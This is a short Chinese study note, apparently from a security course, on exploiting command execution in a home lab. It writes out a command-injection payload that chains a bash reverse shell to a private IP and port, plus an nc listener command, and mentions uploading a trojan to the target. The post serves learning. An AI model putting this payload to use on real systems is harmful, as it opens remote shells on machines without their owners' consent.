当前位置: 首页 > news >正文

命令执行简单(棱角社区有毒)

news 2025/6/29 5:37:11

前言:小迪安全2022第一节反弹shell,小迪用的是两台都是云服务器,没有服务器可以在自己的主机上搭建也是可以的,主机上搭两个网站

思路:生成一个木马文件,下载到本机,然后利用本机上传到目标主机,执行反弹命令。

但是现在这个可以用bash反弹,在centos里面

正题:

在棱角社区,找到反弹shell

这个是写在被攻击机上的,写了这个就会将目标的控制台,返回到以下
bash -i >& /dev/tcp/127.0.0.1/8080 0>&1(错误)

127.0.0.1 & bash -i >& /dev/tcp/192.168.1.150/9999 0>&1(正确)

然后在攻击机上监听上这个端口,监听本地端口的8080

nc64.exe -lvvp 9999                //注意加地址好像会监听失败

做的过程中的问题

在本地监听9999端口,然后在被攻击机上发送对方的控制台给我的本机,

但是结果失败了。

127.0.0.1 & bash -i >& /dev/tcp/192.168.1.150/9999 0>&1(正确)

bash -i >& /dev/tcp/127.0.0.1/8080 0>&1(错误)

http://www.lryc.cn/news/487444.html

相关文章:

  • Keil基于ARM Compiler 5的工程迁移为ARM Compiler 6的工程
  • Kafka-创建topic源码
  • 【网络安全】(一) 0成本添加访问级监控
  • 【Three.js基础学习】26. Animated galaxy
  • vscode使用ssh配置docker容器环境
  • NLP论文速读(EMNLP 2024)|动态奖励与提示优化来帮助语言模型的进行自我对齐
  • 【LeetCode】167. 两数之和 II - 输入有序数组
  • Getx:GetxController依赖管理02,Binding绑定全局控制器(懒加载Controller)
  • leetcode 找不同
  • 2025 - 生信信息学 - GEO数据分析 - RF分析(随机森林)
  • Matlab深度学习(四)——AlexNet卷积神经网络
  • etcd defrag
  • golang语言整合jwt+gin框架实现token
  • 数据治理、数据素养和数据质量管理:文献综述
  • 【Linux】用户和用户组管理
  • 游戏引擎学习第16天
  • 如何通过对敏捷实践的调整,帮助远程团队提升研发效能?
  • Ubuntu Linux使用前准备动作 配置SSH
  • 疫情下的图书馆管理系统:Spring Boot技术
  • vue3完整安装并创建项目
  • 【Linux】Linux入门实操——进程管理(重点)
  • Linux-Apache
  • 高危,Laravel参数注入漏洞安全风险通告
  • 【Qt】使用QString的toLocal8Bit()导致的问题
  • Android上运行Opencv(TODO)
  • 动态IP黑白名单过滤的设计与实现(上篇设计思想)
  • LeetCode 力扣 热题 100道(五)最长回文子串(C++)
  • Docker--Docker Registry(镜像仓库)
  • maven手动上传jar到私服仓库:mvn deploy:deploy-file命令
  • 【机器学习】机器学习中用到的高等数学知识-1.线性代数 (Linear Algebra)